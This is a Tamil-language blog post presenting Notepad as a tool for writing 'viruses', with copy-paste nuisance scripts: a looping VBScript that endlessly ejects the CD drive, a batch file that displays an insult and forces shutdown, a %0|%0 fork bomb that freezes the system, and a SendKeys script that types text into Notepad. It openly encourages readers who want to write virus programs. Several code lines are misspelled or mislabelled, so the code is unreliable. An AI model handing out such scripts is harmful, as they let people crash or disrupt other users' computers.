Header Ads

• சற்று முன்

Notepad – அறிந்ததும் அறியாததும்.

இப்பகுதியில் நாம் பார்க்க போகிற தகவல். விண்டோஸ் இயங்குதலங்களுடன் இலவசமாக இணைந்திருக்கும் Notepad பற்றி அறிந்திருப்போம். இது சில எளிமையான Text editing வேலைகளுக்கும், இணைய அடிப்படையிலான HTML மொழிமூலத்தினையும் ஒருங்கிணைக்கிற (Compile) ஒரு மென்பொருள் என்பதுவும் தெரிந்திருக்கும். என்றாலும் இதை அனைத்தையும் தாண்டி இந்த Notepadஇனை Programming Toolஆகவும் பயன்படுத்தலாம் என்பது உங்களுக்கு தெரியுமா...? ஆம் அதைப்பற்றி தான் இங்கு பார்க்கப்போகிறோம்.
Programming என்பது கணினி துறையை நெருங்கிய பலரின் கனவு என்றே சொல்லலாம். சுயமாக ஒரு கணினி செய்நிரலை எழுதிவிட வேண்டும் என்பது. தகவல் தொழில்நுட்பத்தை நேசிப்பவர்களின் ஒரு கனவு. அதிலும் வைரஸ் செய்நிரல்கள் எழுத வேண்டும் என சிலர் ஆசைப் படுவதும் உண்டு. எனவே அதனை நிறைவேற்ற இந்த பதிவு சற்று உதவி செய்யும்.

ஆம் Notepad மூலம் சாதாரண கணினி செய்நிரல்கள் தொடங்கி கணினியையே செயலிழக்கச் செய்யும் அபாயகரமான வைரஸ்கள் வரை உருவாக்கலாம். அதைப்பற்றி இங்கு பார்ப்போம்.

CD Driveஇனை Eject செய்வதற்கான செயநிரலைப் பார்ப்போம். முதலில் கீழுள்ள Codingஐ காப்பி செய்து Notepadல் Paste செய்து கொள்ளுங்கள்.

Set oWMP = CretObject9"WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.ltem(i).Eject
Next For i = 0 to colCDROMs.Count - 1
colCDROMs.ltem(i).Eject Next End lf
wscript.sleep 5000 loop

பின் அதனை Anything.VBS என Save செய்து கொள்ளுங்கள். இதனை திறந்தால் உங்கள் CD Driveவினை Eject செய்வதும் உள்ளேடுப்பதுமாக இருக்கும். என்ன செய்தும் இதனை நிறுத்த முடியாது. ரீஸ்டார்ட் செய்வதே ஒரே வழி. கடைசியில் CD Drive பழுதடைவது நிச்சயம்.

உங்கள் கணினியை திடிரென Shutdown செய்ய

@echo off

msg * I don't like you

shutdown -c "Error! You are too stupid!" –s
இதனை Anything.bat என Save செய்து. அதனை திறந்தீர்களானால் I don’t like you என்ற செய்தியை காண்பித்து உங்கள் கணினியை Shutdown செய்யும்.

அப்படியே உங்கள் கணினியை (செயலிழக்க) உறைய வைக்க

%0|%0
இதனை Anything.bat என Save செய்து. அதனை திறந்தீர்களானால். உங்கள் கணினி அப்படியே உறைந்து விடும். ரீஸ்டார்ட் செய்வதை தவிர வேறென்ன செய்தும் இதனை சரி செய்ய முடியாது. ரீஸ்டார்ட் செய்வது தான் கடைசி வழி.

அடுத்து பார்க்கப் போவது கொஞ்சம் சுவாரஸ்யமான செய்நிரல். அதாவது Hello! How are you im good ,Thanks என்ற வார்த்தையை மெதுவாக பல Notepad விண்டோக்களில் திறந்து உங்களுக்கு எரிச்சல் ஏற்படுத்தக் கூடியது.

WScript.Sleep 180000

WScript.Sleep 10000

Set WshShell = WScript.CreateObject("WScript.Shell")

WshShell.Run "notepad"

WScript.Sleep 100

WshShell.AppActivate "Notepad"

WScript.Sleep 500

WshShell.SendKeys "Hel"

WScript.Sleep 500

WshShell.SendKeys "lo "

WScript.Sleep 500

WshShell.SendKeys ", ho"

WScript.Sleep 500

WshShell.SendKeys "w a"

WScript.Sleep 500

WshShell.SendKeys "re "

WScript.Sleep 500

WshShell.SendKeys "you"

WScript.Sleep 500

WshShell.SendKeys "? "

WScript.Sleep 500

WshShell.SendKeys "I a"

WScript.Sleep 500

WshShell.SendKeys "m g"

WScript.Sleep 500

WshShell.SendKeys "ood"

WScript.Sleep 500

WshShell.SendKeys " th"

WScript.Sleep 500

WshShell.SendKeys "ank"

WScript.Sleep 500

WshShell.SendKeys "s! "

இதனை Anything.bat என Save செய்து. அதனை திறந்தீர்களானால் Hello! How are you im good ,Thanks என்ற வார்த்தையை மெதுவாக பல Notepad விண்டோக்களில் திறந்து உங்களுக்கு எரிச்சல் ஏற்படுத்தக் கூடியது.

கருத்துகள் இல்லை

Post Top Ad

Post Bottom Ad